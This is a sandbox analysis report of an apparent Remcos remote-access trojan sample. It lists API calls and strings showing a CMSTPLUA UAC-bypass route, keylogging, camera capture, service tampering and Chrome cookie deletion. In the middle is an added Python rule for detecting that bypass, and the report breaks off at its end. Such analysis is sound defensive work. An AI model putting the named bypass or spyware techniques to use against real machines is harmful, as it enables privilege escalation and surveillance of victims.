                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0d17155dc6db7c30058fdf5bf10590413c3ccf5281d5a9a865ac9745ee25c2fc
                                    • Instruction ID: 6cb1fb7365923ae9cd4386fa22a0d7cc2d4bdc50975796c61f51bb0de8f74700
                                    • Opcode Fuzzy Hash: 0d17155dc6db7c30058fdf5bf10590413c3ccf5281d5a9a865ac9745ee25c2fc
                                    • Instruction Fuzzy Hash: B9110272504214BAEB216F728C0496F3AACEF85326B52422BFD11C7252DE38CC41CAA8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C430
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C44D
                                    • CloseHandle.KERNEL32(00000000), ref: 0041C459
                                    • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C46A
                                    • CloseHandle.KERNEL32(00000000), ref: 0041C477
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: File$CloseHandle$CreatePointerWrite
                                    • String ID: hpF
                                    • API String ID: 1852769593-151379673
                                    • Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                    • Instruction ID: 5cb8be75c3dc4c1e2f747800af3fbfd5a98fa41e64789a84fd548ad7506a8702
                                    • Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                    • Instruction Fuzzy Hash: B0110471288220FFEA104B24ACD9EFB739CEB46375F10462AF592C22C1C7259C81863A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 00450C41: _free.LIBCMT ref: 00450C6A
                                    • _free.LIBCMT ref: 00450F48
                                      • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                    • _free.LIBCMT ref: 00450F53
                                    • _free.LIBCMT ref: 00450F5E
                                    • _free.LIBCMT ref: 00450FB2
                                    • _free.LIBCMT ref: 00450FBD
                                    • _free.LIBCMT ref: 00450FC8
                                    • _free.LIBCMT ref: 00450FD3
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                    • Instruction ID: d9348172fd0740f80504453a64c2ebf0df3e8af845a5f6206b1ac0666941ab15
                                    • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                    • Instruction Fuzzy Hash: B411A231540B04AAD625BB72CC47FCB779CAF0230BF44491EBEED66053D6ACB9085745
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00411170
                                    • int.LIBCPMT ref: 00411183
                                      • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                      • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                    • std::_Facet_Register.LIBCPMT ref: 004111C3
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 004111CC
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004111EA
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                    • String ID: (mG
                                    • API String ID: 2536120697-4059303827
                                    • Opcode ID: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
                                    • Instruction ID: 9d9da6683174d9a5c92fa95d325e3547e0845688fcbb555b93a4fb26f280994d
                                    • Opcode Fuzzy Hash: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
                                    • Instruction Fuzzy Hash: 1411EB32900518A7CB14BB9AD8058DEBB79DF44354F10456FBE04A72D1DB789D40C7D9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetLastError.KERNEL32(?,?,0043A351,004392BE), ref: 0043A368
                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A376
                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A38F
                                    • SetLastError.KERNEL32(00000000,?,0043A351,004392BE), ref: 0043A3E1
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: ErrorLastValue___vcrt_
                                    • String ID:
                                    • API String ID: 3852720340-0
                                    • Opcode ID: fe039640f614891bfb869f3d54459c43faa771a51d809113de29b3036e5dc2e7
                                    • Instruction ID: 5d53a0da36a7034647469206452edf011e0dcb0cee8899775f26e7a14c982385
                                    • Opcode Fuzzy Hash: fe039640f614891bfb869f3d54459c43faa771a51d809113de29b3036e5dc2e7
                                    • Instruction Fuzzy Hash: 7F01283214C3519EA61526796C86A6B2648EB0A7B9F30133FF918815F1EF594C90514D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\winhlp32.exe), ref: 004075D0
                                      • Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
                                      • Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                    • CoUninitialize.OLE32 ref: 00407629
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: InitializeObjectUninitialize_wcslen
                                    • String ID: C:\Windows\winhlp32.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                    • API String ID: 3851391207-1839853256
                                    • Opcode ID: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                    • Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
                                    • Opcode Fuzzy Hash: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                    • Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB
                                    Uniqueness

                                    Uniqueness Score: -1.00%
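The function above reaches CMSTPLUA through CoGetObject, i.e. an "Elevation:Administrator!new:" moniker, and its strings ("[+] ucmCMLuaUtilShellExecMethod", "[+] ShellExec success", the winhlp32.exe path) name the ICMLuaUtil::ShellExec route the report's UAC-bypass signature refers to (the ucm prefix is the UACMe project's name for this method). The following Python is an added example, not code from the report or from the sample, showing the process-creation telemetry that this technique leaves. Two facts it relies on are not stated on the page and are assumptions here: the CMSTPLUA COM class is CLSID {3E5FC7F9-9A51-4367-9063-A120244FBEC7}, and an elevated activation of it is hosted by "dllhost.exe /Processid:{that CLSID}", so whatever ShellExec starts is a child of that dllhost. The events are constructed, shaped like Sysmon process-creation records.

```python
"""Process-creation detection for the CMSTPLUA UAC bypass (added example; not
code from the report or from the sample). Assumed and not stated on the page:
CMSTPLUA is CLSID {3E5FC7F9-9A51-4367-9063-A120244FBEC7}, and its elevated
activation is hosted by 'dllhost.exe /Processid:{CLSID}', so anything that
ICMLuaUtil::ShellExec launches appears as a child of that dllhost."""
from typing import Optional

CMSTPLUA_CLSID = "{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"  # assumed value, see above


def _is_dllhost(image: str) -> bool:
    return image.lower().endswith("\\dllhost.exe")


def _hosts_cmstplua(cmdline: str) -> bool:
    # CLSID comparison is case-insensitive; logs print it in either case.
    return CMSTPLUA_CLSID.lower() in cmdline.lower()


def classify(ev: dict) -> Optional[str]:
    """Return a rule name for one process-creation event, or None."""
    if _is_dllhost(ev.get("ParentImage", "")) and _hosts_cmstplua(ev.get("ParentCommandLine", "")):
        return "cmstplua_elevated_child"      # payload started through ICMLuaUtil::ShellExec
    if _is_dllhost(ev.get("Image", "")) and _hosts_cmstplua(ev.get("CommandLine", "")):
        return "cmstplua_surrogate_started"   # weaker: the elevated object was activated
    return None


def scan(events) -> list:
    """Run classify() over a sequence of events and return the hits in order."""
    hits = []
    for ev in events:
        rule = classify(ev)
        if rule:
            hits.append({"rule": rule, "image": ev.get("Image", ""),
                         "parent": ev.get("ParentImage", ""),
                         "integrity": ev.get("IntegrityLevel", "")})
    return hits


# Constructed events. The child image is the winhlp32.exe path the block above prints.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\dllhost.exe",
     "CommandLine": r"C:\Windows\system32\DllHost.exe /Processid:" + CMSTPLUA_CLSID,
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "ParentCommandLine": r"C:\Windows\system32\svchost.exe -k DcomLaunch -p",
     "IntegrityLevel": "High"},
    {"Image": r"C:\Windows\winhlp32.exe",
     "CommandLine": r"C:\Windows\winhlp32.exe",
     "ParentImage": r"C:\Windows\System32\dllhost.exe",
     "ParentCommandLine": r"C:\Windows\system32\DllHost.exe /Processid:" + CMSTPLUA_CLSID,
     "IntegrityLevel": "High"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "ParentCommandLine": r"C:\Windows\Explorer.EXE",
     "IntegrityLevel": "Medium"},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

The child rule is the one to alert on: a High-integrity process whose parent is the CMSTPLUA surrogate, started from a Medium-integrity session, is the bypass itself. The surrogate rule fires whenever the elevated object is activated at all, which is rare on workstations but not unknown, so keep it as a corroborating signal rather than an alert on its own.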

                                    APIs
                                    • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BADD
                                    • GetLastError.KERNEL32 ref: 0040BAE7
                                    Strings
                                    • [Chrome Cookies found, cleared!], xrefs: 0040BB0D
                                    • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAA8
                                    • [Chrome Cookies not found], xrefs: 0040BB01
                                    • UserProfile, xrefs: 0040BAAD
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: DeleteErrorFileLast
                                    • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                    • API String ID: 2018770650-304995407
                                    • Opcode ID: 1760e3e0d40a85f21b6d805f5d6a4de2d8cd9e2060f798d2c7163d0a527507e4
                                    • Instruction ID: 6bc0ec4de36c0471385c24d45a27137009bd471b3f80e31671ebbef4da92dce6
                                    • Opcode Fuzzy Hash: 1760e3e0d40a85f21b6d805f5d6a4de2d8cd9e2060f798d2c7163d0a527507e4
                                    • Instruction Fuzzy Hash: 08018F31A402095ACA04BBBACD5B8BE7724E912714F50017BF802726E6FE7D5A059ADE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • AllocConsole.KERNEL32(00475338), ref: 0041CDA4
                                    • ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                    • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: Console$AllocOutputShowWindow
                                    • String ID: Remcos v$4.9.4 Pro$CONOUT$
                                    • API String ID: 2425139147-3065609815
                                    • Opcode ID: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                                    • Instruction ID: 3d4e39fb732e2b6cb40f789e287104da8d9afdf675614735db993d10cd8ea689
                                    • Opcode Fuzzy Hash: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                                    • Instruction Fuzzy Hash: CD0188719803087AD610F7F1DC8BF9D776C5B14705F6004277604A70D3E7BD9954466E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • __allrem.LIBCMT ref: 0043AC69
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC85
                                    • __allrem.LIBCMT ref: 0043AC9C
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACBA
                                    • __allrem.LIBCMT ref: 0043ACD1
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACEF
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                    • String ID:
                                    • API String ID: 1992179935-0
                                    • Opcode ID: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                    • Instruction ID: 0cac597ccac2158415e78c81c2c349525783c2449c9f0a8280db41f57d0428da
                                    • Opcode Fuzzy Hash: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                    • Instruction Fuzzy Hash: CC812B72640706ABE7209F29CC41B5BB3A9EF48324F24552FF590D7781EB7CE9108B5A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • Sleep.KERNEL32(00000000,0040D262), ref: 004044C4
                                      • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: H_prologSleep
                                    • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                    • API String ID: 3469354165-3054508432
                                    • Opcode ID: 7c33d7a2f0fbcfc682037ee12da25bfab69272e7d38e6870219f47a5674dbce2
                                    • Instruction ID: 62663cdee79800d8a54f028f5a980ee1c6790ad11611a7059aef087dab150aaf
                                    • Opcode Fuzzy Hash: 7c33d7a2f0fbcfc682037ee12da25bfab69272e7d38e6870219f47a5674dbce2
                                    • Instruction Fuzzy Hash: 5C51E1B1A042116BCA14FB369D0A66E3755ABC5748F00053FFA06677E2EF7C8A45839E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 0041179C: SetLastError.KERNEL32(0000000D,00411D1C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 004117A2
                                    • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411D37
                                    • GetNativeSystemInfo.KERNEL32(?,0040D2A2,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411DA5
                                    • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411DC9
                                      • Part of subcall function 00411CA3: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CB3
                                    • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E10
                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E17
                                    • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F2A
                                      • Part of subcall function 00412077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37,?,?,?,?,?), ref: 004120E7
                                      • Part of subcall function 00412077: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 004120EE
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                    • String ID:
                                    • API String ID: 3950776272-0
                                    • Opcode ID: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
                                    • Instruction ID: a5564978de1508fcfe39aaa31f5973b4ee53e0220ffe5d2cf9b9f7f7cc9a58c7
                                    • Opcode Fuzzy Hash: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
                                    • Instruction Fuzzy Hash: B661E370601201ABC7109F66C980BAB7BA5BF44744F04411BFA058B7A2E7BCE8D2CBD9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __cftoe
                                    • String ID:
                                    • API String ID: 4189289331-0
                                    • Opcode ID: f6186a22dc1495ee10cb0196102dbbca6683bf9def1bac59c87bc21f53538327
                                    • Instruction ID: 6c78d09a6f5169ef6f707262af513c71f712f2c279f5202ad8aecd4a6012115a
                                    • Opcode Fuzzy Hash: f6186a22dc1495ee10cb0196102dbbca6683bf9def1bac59c87bc21f53538327
                                    • Instruction Fuzzy Hash: D951EA72900A05ABFF209B59CC81FAF77A9EF49334F14421FF515A6293DB39D900866C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041AC88
                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A38E,00000000), ref: 0041AC9C
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACA9
                                    • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041ACDE
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF0
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF3
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                    • String ID:
                                    • API String ID: 493672254-0
                                    • Opcode ID: efec56fc5935d5a2572c80bdc1daad9799237a8c2fd258714d4154745ff5c6c1
                                    • Instruction ID: ed0bae8235b77a8e2b5b4951a925fd67a34dfbd091713fce30693036f81a5133
                                    • Opcode Fuzzy Hash: efec56fc5935d5a2572c80bdc1daad9799237a8c2fd258714d4154745ff5c6c1
                                    • Instruction Fuzzy Hash: 84014E311452147BD6110B385C4DEFB3B5CDB42771F100317F925922D1EA68CD45B5EE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                    • _free.LIBCMT ref: 0044824C
                                    • _free.LIBCMT ref: 00448274
                                    • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                    • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                    • _abort.LIBCMT ref: 00448293
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$_free$_abort
                                    • String ID:
                                    • API String ID: 3160817290-0
                                    • Opcode ID: 35dcf3de7c71c62167c4cd53af3f8df7186468cbd06746618ca28f838e92064e
                                    • Instruction ID: 1e51d54565af68f960eede883612623578b8b4ccb82fc25c91f14e3db4823c68
                                    • Opcode Fuzzy Hash: 35dcf3de7c71c62167c4cd53af3f8df7186468cbd06746618ca28f838e92064e
                                    • Instruction Fuzzy Hash: 15F0F935104F006AF611332A6C05B5F2515ABC276AF25066FF92892292DFACCC4581AD
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5
                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAD6
                                    • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAF7
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAFA
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ControlManager
                                    • String ID:
                                    • API String ID: 221034970-0
                                    • Opcode ID: 4ae3873c1f536b49cfb6b65ca2e5a3703e9976f2291b0d96870e63be56c21842
                                    • Instruction ID: 651adf303b3d55a6ad93a9774d9c6d096703db2647e4265c62a250da7e042a32
                                    • Opcode Fuzzy Hash: 4ae3873c1f536b49cfb6b65ca2e5a3703e9976f2291b0d96870e63be56c21842
                                    • Instruction Fuzzy Hash: 68F0C231541218ABD711AF25AC49EFF3B6CDF45BA2F000026FE0992192DB68CD4695E9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABB9
                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABDA
                                    • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFB
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFE
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ControlManager
                                    • String ID:
                                    • API String ID: 221034970-0
                                    • Opcode ID: 81e2b4606ab98421978dc9842ef1edfa46dc1b90a9204ca08327dde20b0592b6
                                    • Instruction ID: cdcae22f94af1ce7d279f83afe572816001e75aa845eac4345c2c81124f82824
                                    • Opcode Fuzzy Hash: 81e2b4606ab98421978dc9842ef1edfa46dc1b90a9204ca08327dde20b0592b6
                                    • Instruction Fuzzy Hash: 84F0C231501218ABD6116F259C49DFF3B6CDB45B62F40002AFE0996192EB38DD4595F9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC20
                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC34
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC41
                                    • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC50
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC62
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC65
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ControlManager
                                    • String ID:
                                    • API String ID: 221034970-0
                                    • Opcode ID: fc89c5385e453168767847f65058b20f434ef67782af095c3a641765214ec1d0
                                    • Instruction ID: 1af6be829003de2eeb85b71d4b0cbdb2c911632148e7083bdbbda8586ff13133
                                    • Opcode Fuzzy Hash: fc89c5385e453168767847f65058b20f434ef67782af095c3a641765214ec1d0
                                    • Instruction Fuzzy Hash: 2FF0F631501228BBD711AF25EC49DFF3B6CDB45B62F00002AFE0992192EB38CD4595F9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B172
                                    • wsprintfW.USER32 ref: 0040B1F3
                                      • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: EventLocalTimewsprintf
                                    • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                    • API String ID: 1497725170-248792730
                                    • Opcode ID: 5930b91d6002e4bc173ab4be93e7cb7fd053249898d40d7797ac70fa62357d50
                                    • Instruction ID: 81b60f5d3581edaaac31e3e44e1e4f5c322996b2d8bf5e7d6f89c643b346fb92
                                    • Opcode Fuzzy Hash: 5930b91d6002e4bc173ab4be93e7cb7fd053249898d40d7797ac70fa62357d50
                                    • Instruction Fuzzy Hash: 82117F72504118AACB18AB96EC558FE77BCEE48315B00012FF506A60E1FF7C9E46C6AC
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                    • Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                    • CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                                    Strings
                                    Memory Dump Source
